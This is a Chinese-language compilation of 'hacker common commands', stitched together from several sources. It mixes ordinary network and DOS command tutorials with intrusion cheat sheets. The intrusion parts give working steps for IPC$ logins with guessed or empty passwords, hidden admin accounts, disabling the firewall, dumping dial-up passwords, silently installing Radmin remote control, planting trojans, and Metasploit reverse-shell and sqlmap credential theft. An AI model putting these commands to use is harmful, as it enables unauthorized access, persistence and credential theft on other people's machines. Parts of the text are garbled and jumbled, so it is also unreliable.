黑客常用命令大全

实验一常用网络命令（测试工具）一、介绍基本网络测试工具1. ping命令2. tracert命令3. netstat命令4. ipconfig命令1．ping命令（Packet Internet Groper，因特网包探索器）原理：利用网络上主机IP地址的唯一性，给目的IP地址发送一个数据包，再要求对方返回一个同样大小的数据包来确定两台主机是否连通，时延是多少。

利用ping命令可以排查网卡、Modem、电缆和路由器等存在的故障。

ping命令只有在安装了TCP/IP协议后才可以使用。

运行ping命令后，在窗口中会返回对方客户机的IP地址和表明ping通对方的时间，如果出现信息“Reply from ...”，则说明能与对方连通；如果出现信息“Request timeout ...”，说明不能与对方连通。

缺省设置时，每发出一个ping命令就向对方发送4个网间控制报文协议ICMP的回送请求，如果网络正常，发送方将得到4个回送的应答。

ping命令发出后得到以毫秒或者毫微秒为单位的应答时间，时间越短表示数据路由越畅通；反之则说明网络连接不够畅通。

ping命令显示的TTL(Time To Live：存在时间)值，可以推算出数据包通过了多少个路由器。

如果ping不成功，故障可能出现在以下几个方面：网线、网卡、IP地址。

2．tracert命令tracert命令用来显示数据包到达目标主机所经过的路径，并显示到达每个节点的时间。

因此，tracert也称为跟踪路由命令。

tracert命令通过递增“存在时间(TTL)”的值将“ICMP 回送请求”报文发送给目标主机，从而确定到达目标主机的路径。

所显示的路径是源主机与目标主机间路径上的路由器的近侧接口列表，近侧接口是距离路径中的发送主机最近的路由器的接口。

3．netstat命令netstat命令帮助网络管理员了解网络的整体使用情况，是一个监控TCP/IP网络的工具，它可以显示路由表、当前正在活动的网络连接的详细信息，可以统计目前总共有哪些网络连接正在运行。

以下列出在NT系统中基本的网络命令和使用方法：一、ipconfig命令：ipconfig命令应该是最最基础的命令了，主要功能就是显示用户所在主机内部的IP协议的配置信息等资料。

它的主要参数有：all：显示与TCP/IP协议相关的所有细节信息，其中包括测试的主机名、IP地址、子网掩码、节点类型、是否启用IP路由、网卡的物理地址、默认网关等。

renew all：更新全部适配器的通信配置情况，所有测试重新开始。

release all：释放全部适配器的通信配置情况。

renew n：更新第n号适配器的通信配置情况，所有测试重新开始。

例如：C:\>ipconfigWindows IP ConfigurationEthernet adapter 本地连接:Connection-specific DNS Suffix . :IP Address. . . . . . . . . . . . : 192.168.0.14Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.0.1二、Net命令：Net命令主要是在windows NT平台中完成一些网络工作，它的功能非常强大，可以这么说如果你想学习windows平台下的网络安全，必须熟悉使用该命令。

该命令的语法很多，功能强大，我们只是介绍一些简单常用的。

1.建立IPC连接:只要你拥有某IP的用户名和密码，那就用IPC$做连接,这里我们假如你得到的用户是管理员administrator，密码是123456。

假设对方IP为192.168.0.1net use \\192.168.0.1\ipc$ "123456" /user:"administrator"一般会显示如下信息：C:\>net use \\192.168.0.1\ipc$ "123456" /user:"administrator"命令成功完成。

⿊客攻击常⽤CMD命令⼤全⿊客常⽤命令⼤全net user heibai lovechina /add 加⼀个heibai的⽤户密码为lovechinanet localgroup Administrators heibai /add 把他加⼊Administrator组net start telnet 开对⽅的TELNET服务net use z:\127.0.0.1c映射对⽅的C盘netuseip\ipc " " /user:" " 建⽴IPC空链接net use \\ip\ipc "密码" /user:"⽤户名" 建⽴IPC⾮空链接 net use h: \\ip\c "密码" /user:"⽤户名" 直接登陆后映射对⽅C：到本地为H:net use h: \\ip\c登陆后映射对⽅C：到本地为H: net use \\ip\ipc /del 删除IPC链接net use h: /del 删除映射对⽅到本地的为H:的映射net user ⽤户名　密码　/add 建⽴⽤户net user 查看有哪些⽤户net user 帐户名查看帐户的属性net user guest /active:yes 将Guest⽤户激活net user guest lovechina 把guest的密码改为lovechinanet user ⽤户名 /delete 删掉⽤户net user guest/time:m-f,08:00-17:00 表⽰guest⽤户登录时间为周⼀⾄周五的net user guest/time:m,4am-5pm;t,1pm-3pm;w-f,8:00-17:00 表⽰guest⽤户登录时间为周⼀4:00/17:00,周⼆13:00/15:00,周三⾄周五8:00/17:00.net user guest/time:all表⽰没有时间限制.net user guest/time 表⽰guest⽤户永远不能登录. 但是只能限制登陆时间，不是上⽹时间net time \\127.0.0.1 得到对⽅的时间，get c:\index.htm d:\ 上传的⽂件是INDEX.HTM，它位于C:\下，传到对⽅D:\copy index.htm \\127.0.0.1\c\index.htm 本地C盘下的index.htm复制到127.0.0.1的C盘 net localgroup administrators ⽤户名 /add 把“⽤户”添加到管理员中使其具有管理员权限,注意：administrator后加s⽤复数 net start 查看开启了哪些服务 net start 服务名　开启服务；(如:net start telnet， net start schedule) net stop 服务名停⽌某服务 net time \\⽬标ip 查看对⽅时间 net time \\⽬标ip /set 设置本地计算机时间与“⽬标IP”主机的时间同步,加参数/yes可取消确认信息 net view 查看本地局域⽹内开启了哪些共享 net view \\ip 查看对⽅局域⽹内开启了哪些共享net config 显⽰系统⽹络设置 net logoff 断开连接的共享 net pause 服务名暂停某服务 net send ip "⽂本信息" 向对⽅发信息 net ver 局域⽹内正在使⽤的⽹络连接类型和信息 net share 查看本地开启的共享 net share ipc开启ipc共享 net share ipc /del 删除ipc共享 net share c /del 删除C：共享net user guest 12345 ⽤guest⽤户登陆后⽤将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端⼝,常⽤netstat -annetstat -n 查看端⼝的⽹络连接情况，常⽤netstat -annetstat -v 查看正在进⾏的⼯作netstat -p 协议名例：netstat -p tcq/ip 查看某协议使⽤情况（查看tcp/ip协议使⽤情况）netstat -s 查看正在使⽤的所有协议使⽤情况nbtsta* -* ** 对⽅136到139其中⼀个端⼝开了的话，就可查看对⽅最近登陆的⽤户名（03前的为⽤户名）-注意：参数-A要⼤写tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”⽤于设置超时间隔。

黑客键盘使用方法导语：黑客键盘作为黑客工具的重要一环，具有强大的功能和灵活的操作方式。

本文将详细介绍黑客键盘的使用方法，包括快捷键、命令输入和常用功能等，帮助读者更好地利用黑客键盘进行操作和实施安全测试。

一、快捷键1. Tab键：在命令行中，Tab键用于自动补全命令和文件路径，提高输入效率。

2. Ctrl+C：用于终止当前运行的命令，相当于“结束任务”。

3. Ctrl+Z：将当前命令放到后台运行，可以使用“fg”命令将其重新调回。

4. Ctrl+D：退出当前会话或终止当前进程。

5. Ctrl+Alt+Del：强制重启计算机，常用于解决系统死机或无响应问题。

6. Ctrl+Shift+Esc：打开任务管理器，可以查看和关闭正在运行的程序。

二、命令输入1. 常用命令：（1）ping：用于测试网络连通性，检测目标主机是否在线。

（2）tracert：用于跟踪数据包在网络中的路径，分析网络延迟和故障。

（3）netstat：用于查看网络连接、监听端口和网络统计信息。

（4）ipconfig：用于查看和配置网络接口信息，包括IP地址、子网掩码等。

（5）nslookup：用于查询域名对应的IP地址或反向查询。

2. 命令参数：（1）-h：显示命令的帮助信息。

（2）-a：显示完整的信息，包括IP地址、主机名等。

（3）-n：以数字形式显示结果，不进行域名解析。

（4）-r：刷新DNS缓存，更新域名解析信息。

三、常用功能1. 端口扫描：使用黑客键盘可以通过输入命令扫描目标主机的开放端口，以便发现系统漏洞和安全风险。

2. 暴力破解：黑客键盘可以通过输入命令进行用户名和密码的暴力破解，测试目标系统的安全性。

3. 木马植入：黑客键盘可以通过输入命令植入木马程序，实现对目标主机的远程控制和信息窃取。

4. 数据包嗅探：通过黑客键盘输入相应命令，可以监听网络数据包，获取目标主机的敏感信息。

5. 漏洞利用：黑客键盘可以输入命令调用已知漏洞的利用工具，攻击目标系统，实现权限提升和系统入侵。

cmd.exe是一个命令扩展接口，外面利用它可以执行系统的环境变量下的任意可执行程序，操作类似与以前的ms-dos，但功能却比ms-dos要强大的多，虽然学习有点抽象，但我们只要把ms-dos的基础打好，也很容易上手，如果各位对dos命令很陌生的话，就先去补习一下dos命令再来看本文，如果文章前那位是位system高手，就请掠过次页吧，好了不多说废话，请看下面：一、外部命令：1、 atmadm.exe：打开ATM调用管理器，-c表示列出所有连接、-s表示只显示统计、-a表示列出所有注册的连接地址。

2、 arp.exe：查看和修改本地ARP（地址解析协议）表项命令，/a 显示当前网络接口和当前的ARP表、/d 删除指定的IP的ARP表、/s 添加有IP地址和MAC地址指定的ARP表。

在使用ARP命令是通常是先PING 对方或网关的IP地址。

3、 attrib.exe：文件属性设置，+代表设置属性、-代表取消属性、/s代表设置当前目录和子目录文件（支持通配符）、/d代表设置文件夹（支持通配符），设置选项如下：a 存档属性、s 系统属性、h 隐藏属性、r 只读属性。

比如给c:\windows所有目录及子目录加系统、隐藏属性，命令如下：attrib +s +dc:\windows\*.* /s /d 。

4、 auditusr.exe：设置每用户审核策略，/is 添加或更改成功策略审核、/if 添加或更改失败策略审核、/r 删除所有安全策略审核、/ra 删除所有用户策略审核、/e 将当前用户策略审核配置导出到文件、/i 从文件导入用户策略审核配置。

5、 blastcln.exe：微软的恶意程序移除工具命令行程序，只有/v参数，运行后会检测系统服务、系统程序、注册表启动项、被病毒破坏或丢失的文件名等等。

检测完毕之后会给出报告。

6、 bootcfg.exe：系统启动项配置程序，考虑到参数众多又对外面无多么大实际作用，大家可以输入bootcfg.exe /?参见其的中文命令参数帮助。

黑客常用入侵命令控制面版：运行>>>>>>>>>>>:control计算机管理：command MMC结束XP防火墙进程:net stop sharedaccess查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\pass.txt启动3389服务：net start TermService关闭所有防火墙的代码:cmd.exe /c net stop sharedaccessiis命令重启:iisreset /reboot用CMD命令实现路由跟踪:tracert 域名(如：)结束进程：NET SHARE查看版本：ver查看中端(服务）：net start查看文件：dir查看3389：加用户：c:\winnt\system32>net user adminserver$ admin /add提权限：net localgroup administrators adminserver$ /add211.38.172.2 2180查看用户net user远程连接到主机CMD命令：telnet 主机IP踢人：logoff ID查看当前人：query user打开telnet:net start telnettelnet连接工具：OpenTelnet删除共享：net share c$=c:\删除共享：net share c$ /del启用GUEST：net user guest /active:yes为GUEST设密码：net user guest 888888提升到管理员：net localgroup "Administrators" guest /add超级用户隐藏器:c:\door adminserver$:admin克隆帐号：ca \\IP 你建立的帐号密码肉机默认帐号密码ca \\127.0.0.1 adminserver$ admin adminserver admin完全禁止系统模认工享[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComput er\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]3389替换服务-----------------------中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]c:\winnt\system32\copy termsrv.exe service.exec:\winnt\system32\cd..c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe端口转向：f:\web\ftp.exe "c:\fpipe.exe -v -l 开放的端口-r 要转向的端口ip"使用空口令连接:net use \\对方IP\ipc$ "" /user:"administrator"(在上传文件的目录下)远程复制文件:c:\radmin>net use \\a-01\ipc$ "12345" /user:administratorc:\ramdin>copy r_server.exe \\a-01\admin$\system32c:\ramdin>copy radmin.reg \\a-01\admin$\sytem32在对方CMD下：c:\winnt\system32\>regedit /s radmin.regc:\winnt\system32\>r_server.exe /install /silenecnet start r_servercopy r_server.exe \\对方IP\admin$\system32c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90copy 文件名\\IP\admin$\system32进入对方CMD:c:\opentelnet.exe \\Ip administrator "" 0 90登陆CMD:c:\telnet IP 90安装RADMIN:c:\winnt\system32\r_server /install silencec:\winnt\system32\r-server导入注册表:c:\winnt\system32\regedit.exe /s aaa.reg看端口:c:\winnt\system32\netstat -an改端口:c:\winnt\system32\r_server.exe /port:1024 /pass:1234 /save /silence起动服务:c:\winnt\system32\net start r_server隐藏文件:c:\winnt\system32\attrib.exe +h r_server.exe +h%systemroot$\system32看看共享开了没有,没有的话把共享开开c:\winnt\system32>net share清单是空的。

黑客常用dos命令学习黑客必先修炼dos操作,一个好的黑客,dos 是基础,零基础入门到精通全套黑客视频教程视频教程黑客常用dos命令（1）选用/P参数，系统在删除前询问是否真要删除该文件，若不使用这个参数，则自动删除；（2）该命令不能删除属性为隐含或只读的文件；（3）在文件名称中可以使用通配符；（4）若要删除磁盘上的全部文件（DEL**或DEL），则会提示：(Arey ou sure？）（你确定吗？）若回答Y，则进行删除，回答N，则取消此次删除作业。

（八）UNDELETE——恢复删除命令1．功能：恢复被误删除命令2．类型：外部命令。

3．格式：UNDELETE[盘符：][路径名]〈文件名〉[/DOS]/LIST][/ALL] 4．使用说明：使用UNDELETE可以使用“*”和“？”通配符。

（1）选用/DOS参数依据名目里残留的记录来恢复文件。

由于文件被删除时，名目所记载斩文件名第一个字符会被改为E5，DOS即依据文件开头的E5和其后续的字符来找到欲恢复的文件，所以，UNDELETE会要求用户输入一个字符，以便将文件名字补齐。

但此字符不必和原来的一样，只需符合DOS的文件名规章即可。

（2）选用/LIST只“列出”符合指定条件的文件而不做恢复，所以对磁盘内容完全不会有影响。

（3）选用/ALL自动将可完全恢复的文件完全恢复，而不一一地询问用户，使用此参数时，若UNDELTE利用名目里残留的记录来将文件恢复，则会自动选一个字符将文件名补齐，并且使其不与现存文件名相同，选用字符的优选挨次为：#%——0000123456789A~Z。

UNDELETE还具有建立文件的防护措施的功能，已超出本课程授课范围，请读者在使用些功能时查阅有关DOS手册。

七、其它命令（一）CLS——清屏幕命令1功能：清除屏幕上的全部显示，光标置于屏幕左上角。

2类型：内部命令。

用DOS，可别不知道DOS在哪里运行，有好几种方法1.开始菜单---程序---附件---命令提示符2.开始菜单---运行---打命令CMD一、常用DOS命令(1)cd.. cd.. 退到次一级目录cd\ cd\ 退到根目录下的意思cd 文件夹名字cd windows 进入WINDOWS目录(2)md 文件夹名字md win 建立名为win的文件夹(3)rd 文件夹名字rd win 删除名为win的文件夹（前提是win里没有任何文件）(4)copy 路径下文件目标路径copy C:\1\mima.txt C:\2\ 拷贝文件(5)del 目标路径下文件del C:\1\3\TCP.txt 删除文件del c:\1 删除c盘1目录所有文件看见没mima.txt被删除了但是3这个文件夹还没删除只是文件不会删除ghost里其他文件夹里的东西。

(6)dir 文件夹名字或盘符dir c:\windows 查看C盘windows里目录文件----------------------------------------------------------------------------│dir/W：宽屏显示，一排显示5个文件名，而不会显示修改时间，文件大小等信息；││dir/S：显示当前目录及其子目录下所有的文件，││dir/a 查看所有文件包括隐藏文件dir c:\windows /a ││dir/p 分页查看这里的很实用的,大家一定要自己试试│-----------------------------------------------------------------------------(为了节省大家的时间,方框里面的我就不介绍了,大家自己试试)(7)format 盘符格式化硬盘（这个我就不演示了.你问我为什么,汉.........我心疼我的硬盘^_^）(8)ren 文件名文件名改名ren 1.bat 2.bat 将1.bat改名为2.bat 这几个文件我还没创建,现在我们创建一下,好了(9)type 文件名查看文件内容（一般用来看bat或txt文件）(10)cls 清屏（没多大用）二、常用网络DOS命令(11)fport 查看系统端口和端口上运行的程序这个命令我也不知道怎么了,等我查一下用法,发到论坛上,不好意思,(12)netstat -an 查看所有连接本机IP(13)ipconfig /all 查看所有连接本机IP(14)telnet IP 端口连接对方机器某个端口(15)net user 查看本机用户net user 用户名密码/add 建立一个用户net user 用户名/del 删除一个用户(16)net localgroup administrators 用户名/add 把用户添加到管理员net localgroup administrators 用户名/del 把用户从管理员组删除这个就不用演示了,和上面的一样三、批处理文件批处理。

要成为真正黑客必须掌握的**技术|黑客常用CMD命令只要删除这些就可以了有些系统NT装置在D盘或其他盘，就要把C改成其他盘。

1NET只要你拥有某IP用户名和密码，那就用IPC$做连接吧!这里我假如你得到用户是hbx密码是123456假设对方IP为127.0.0.1netus\\127.0.0.1\ipc$"123456"/user:"hbx"退出的命令是netus\\127.0.0.1\ipc$/delte下面的操作你必需登陆后才可以用.登陆的方法就在上面.----------------------下面我讲怎么创建一个用户，由于SA 权限相当于系统的超级用户.加一个heibai用户密码为lovechinanetuserheibailovechina/add只要显示命令胜利，那么我可以把他加入Administr组了.netlocalgroupA dministrheibai/add----------------------这里是讲映射对方的C盘，当然其他盘也可以，只要存在就行了.这里把对方的C盘映射到外地的Z盘.netusz:\\127.0.0.1\c$----------------------netstarttelnet这样可以打开对方的TELNET服务.----------------------这里是将Guest用户激活，guestNT默认用户，而且无法删除呢?不知道是否这样，2000就是删除不了netuserguest/active:yes----------------------这里是把一个用户的密码改掉，把guest密码改为lovechina其他用户也可以的只要有权限就行了呀!netuserguestlovechinanet命令果然强大啊!2:at一般一个**者**后都会留下后门，也就是种木马了把木马传了上去，怎么启动他呢?那么需要用AT命令，这里假设你已经登陆了那个服务器。

黑客入侵中常用的命令*net user 查看用户列表*net user 用户名密码/add 添加用户*net user 用户名密码更改用户密码*net localgroup administrators 用户名/add 添加用户到管理组*net user 用户名/delete 删除用户*net user 用户名查看用户的基本情况*net user 用户名/active:no 禁用该用户*net user 用户名/active:yes 启用该用户*net share 查看计算机IPC$共享资源*net share 共享名查看该共享的情况*net share 共享名=路径设置共享。

例如net share c$=c:*net share 共享名/delete 删除IPC$共享*net use 查看IPC$连接情况*net use //ip/ipc$ "密码" /user:"用户名" ipc$连接*net time //ip 查看远程计算机上的时间*copy 路径:/文件名//ip/共享名复制文件到已经ipc$连接的计算机上*net view ip 查看计算机上的共享资源*ftp 服务器地址进入FTP服务器*at 查看自己计算机上的计划作业*at //ip 查看远程计算机上的计划作业*at //ip 时间命令(注意加盘符) 在远程计算机上加一个作业*at //ip 计划作业ID /delete 删除远程计算机上的一个计划作业*at //ip all /delete 删除远程计算机上的全部计划作业珍藏的最全的windows操作系统快捷键一、常见用法：F1显示当前程序或者windows的帮助内容。

F2当你选中一个文件的话，这意味着“重命名”F3当你在桌面上的时候是打开“查找：所有文件” 对话框F10或ALT激活当前程序的菜单栏windows键或CTRL+ESC打开开始菜单CTRL+ALT+DELETE在win9x中打开关闭程序对话框DELETE删除被选择的选择项目，如果是文件，将被放入回收站SHIFT+DELETE删除被选择的选择项目，如果是文件，将被直接删除而不是放入回收站CTRL+N新建一个新的文件CTRL+O打开“打开文件”对话框CTRL+P打开“打印”对话框CTRL+S保存当前操作的文件CTRL+X剪切被选择的项目到剪贴板CTRL+INSERT 或CTRL+C复制被选择的项目到剪贴板SHIFT+INSERT 或CTRL+V粘贴剪贴板中哪谌莸降鼻拔恢?ALT+BACKSPACE 或CTRL+Z 撤销上一步的操作ALT+SHIFT+BACKSPACE重做上一步被撤销的操作Windows键+M最小化所有被打开的窗口。

简单黑客代码简单黑客代码是指能够让普通人轻松掌握的基础黑客技术，其中包含了一些简单却非常实用的代码，可以用于网络安全检测、漏洞利用和密码破解等方面。

在黑客领域，又称为“入门代码”或“初级代码”。

下面将就简单黑客代码作一简单介绍。

一、网络安全检测代码1. 网络Ping扫描代码在命令行下输入代码：ping -t 192.168.1.1，能够实现对局域网中指定地址的Ping扫描，定位网络故障。

2. 端口扫描代码使用Nmap扫描指定IP地址可知道该IP地址开放了哪些端口，留下了哪些漏洞。

使用黑客已经熟练掌握，这里只简单介绍Nmap命令行使用方法：nmap IP地址：对指定IP地址的端口进行扫描nmap -O IP地址：通过探测目标操作系统对端口进行扫描3. SQL注入漏洞检测代码使用SQLmap对目标网站进行扫描，获得数据库的结构、数据和管理员密码等敏感信息，实现轻松访问网站。

SQLmap使用方法：python sqlmap.py -u URL --dbs：扫描目标网站，获取目标数据库信息python sqlmap.py -u URL -D 数据库名 --tables：获取指定数据库的所有数据表二、漏洞利用代码1. Metasploit利用漏洞代码Metasploit是一个开源的渗透测试框架，包含超过1600种已知漏洞的利用模块。

Metasploit使用流程：msf > search 关键字：搜索系统有没有指定关键字相关的漏洞msf > use exploit/path/soon：选择一个漏洞利用模块msf > set payload payload/windows/meterpreter/reverse_tcp：设置payload上传反弹回来的shellmsf > set RHOSTS IP地址：设置目标主机IP地址msf > exploit：开始攻击2. 远程溢出漏洞利用代码使用Metasploit实现对远程主机的控制，即可进行任意操作。

net use $">\\ip\ipc$ " " /user:" " 建立IPC空链接net use $">\\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: $">\\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:net use h: $">\\ip\c$ 登陆后映射对方C：到本地为H:net use $">\\ip\ipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名密码/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名查看帐户的属性net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数net start 查看开启了哪些服务net start 服务名开启服务；(如:net start telnet，net start schedule)net stop 服务名停止某服务net time \\目标ip 查看对方时间net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view \\ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipc$共享net share ipc$ /del 删除ipc$共享net share c$ /del 删除C：共享net user guest 12345 用guest用户登陆后用将密码改为12345net password 密码更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况，常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写tracert -参数ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

3.1基本DOS命令在DOS应用中，一些基本的命令是必须掌握的，例如查看目标主机的资源、路径的切换等。

下面归纳了一些基本的DOS命令，帮助用户更好地学习DOS。

3.1.1 Dir命令Dir命令是显示磁盘目录命令。

在命令提示符窗口中输入Dir命令，然后按下Enter键，即可查看当前目录下的资源列表。

根据资源列表中显示的文件/文件夹名称，可以轻松调用其中的文件资源，还可以进行路径的切换。

对于一名黑客来说，必须记住Dir 命令的/a参数，该参数是查看目标主机中带有隐藏性质的文件，例如木马程序、病毒程序等。

使用Dir命令的格式为DIR+盘符+路径+/P+/W。

/P作用是当要查看的目录太多，无法在一屏显示完屏幕会一直往上卷，不容易看清，加上/P参数后，屏幕上会分面一次显示23行的文件信息，然后暂停，并提示Press any key to continue(按下任意键继续)。

/W作用是只显示文件名，至于文件大小及建立的日期和时间则都省略。

加上参数后，每行可以显示5个文件名。

【例3-1】在命令提示符窗口中使用Dir命令来查看D盘中的资源。

打开命令提示符窗口，输入Dir d: /a:d命令，按下Enter键，即可查看D盘下的所有文件目录。

输入Dir d: /a-d命令，按下Enter键，即可查看D盘下的所有文件。

3.1.2 CD命令CD(Change Directory)命令是改变目录命令，可以用于切换路径目录。

CD命令的使用主要有以下3种方法。

CD PA TH：PA TH是路径的意思，例如输入CD C:\Windows、CD \C:等。

主要路径存在，在CD后面就可以输入该路径，否则提示错误信息。

CD..：CD后面加上两个“.”号表示黑客攻防入门与进阶36回到上级父目录，例如当前命令提示符路径为D:\users\administrator，输入CD..命令，按下Enter键后，将会返回到上一级目录，即D:\users目录。

(一）md——建立子目录1．功能：创建新的子目录2．类型：内部命令3．格式：md[盘符：][路径名]〈子目录名〉4．使用说明：（1）“盘符”：指定要建立子目录的磁盘驱动器字母，若省略，则为当前驱动器；（2）“路径名”：要建立的子目录的上级目录名，若缺省则建在当前目录下。

例：（1）在c盘的根目录下创建名为fox的子目录；（2）在fox子目录下再创建user子目录。

c：\＞md fox （在当前驱动器c盘下创建子目录fox）c：\＞md fox \user （在fox 子目录下再创建user子目录）（二）cd——改变当前目录1．功能：改变当前目录2．类型：内部命令3．格式：cd[盘符：][路径名][子目录名]4．使用说明：（1）如果省略路径和子目录名则显示当前目录；（2）如采用“cd\”格式，则退回到根目录；（3）如采用“cd..”格式则退回到上一级目录。

例：（1）进入到user子目录；（2）从user子目录退回到子目录；（3）返回到根目录。

c:\＞cd fox\user（进入fox子目录下的user子目录）c:\fox\user＞cd.. （退回上一级根目录,注意cd后面跟着两个点".."）。

c：\fox＞cd\ （返回到根目录）c:\（三）rd——删除子目录命令1．功能：从指定的磁盘删除了目录。

2．类型：内部命令3．格式：rd[盘符：][路径名][子目录名]4．使用说明：（1）子目录在删除前必须是空的，也就是说需要先进入该子目录，使用del（删除文件的命令）将其子目录下的文件删空，然后再退回到上一级目录，用rd命令删除该子目录本身；（2）不能删除根目录和当前目录。

例：要求把c盘fox子目录下的user子目录删除，操作如下：第一步：先将user子目录下的文件删空；c\＞del c：\fox\user\*.* 或 del c:\fox\user 或 delc:\fox\user\*(注:这样只能删除文件,仍然不能删除user目录下的文件夹)第二步，删除user子目录。